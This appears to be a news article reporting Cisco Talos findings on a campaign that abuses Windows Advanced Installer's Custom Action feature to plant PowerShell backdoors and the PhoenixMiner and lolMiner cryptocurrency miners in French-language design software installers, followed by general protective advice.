Hackers Exploit Windows Tool to Drop Cryptocurrency-Mining Malware
In a recent analysis by Cisco’s Talos Intelligence, it has been revealed that hackers have been utilizing a Windows tool since November 2021 to distribute cryptocurrency-mining malware. The tool being exploited is Windows Advanced Installer, which developers use to package software installers like Adobe Illustrator. By leveraging this tool, the attacker can execute malicious scripts on compromised machines.
Targeting Graphic Designers and 3D Modeling Software Installers
The malware campaign primarily targets software installers used for 3D modeling and graphic design, with a majority of them being written in French. This suggests that victims are likely from various industries, including architecture, engineering, construction, manufacturing, and entertainment in French-speaking countries.
Geographical Impact and Modus Operandi
The attacks mainly affect users in France and Switzerland, but there have also been infections reported in other countries such as the United States, Canada, Algeria, Sweden, Germany, Tunisia, Madagascar, Singapore, and Vietnam. The attacker establishes a backdoor in the victim’s machine using malicious PowerShell and Windows batch scripts, taking advantage of PowerShell’s ability to run in system memory rather than the hard drive, making detection more challenging.
The Payload: Ethereum-Mining Programs
Once the backdoor is installed, the attacker deploys additional threats, including the Ethereum crypto-mining program PhoenixMiner and the multicoin mining threat lolMiner. These programs utilize the GPU capabilities of infected computers.
“These malicious scripts are executed using Advanced Installer’s Custom Action feature, which allows users to predefine custom installation tasks. The final payloads are PhoenixMiner and lolMiner, publicly available miners relying on computers’ GPU capabilities.”
Understanding Cryptojacking and Its Impact
The use of crypto-mining malware, also known as cryptojacking, involves surreptitiously installing mining code on devices without the user’s knowledge or permission. Signs of mining malware include device overheating and decreased performance. This practice of hijacking devices to mine or steal cryptocurrencies is not new and has been observed targeting sectors such as financial services, healthcare, and government.
Hot Take: Protect Yourself from Crypto-Mining Malware
As the prevalence of crypto-malware continues to rise, it is crucial to stay vigilant and employ robust cybersecurity practices. Regularly update your operating system and software, use reputable antivirus software, and exercise caution when downloading and installing programs. By adopting these measures, you can safeguard your devices and protect your resources from falling into the hands of malicious actors.
By
By
By
By
By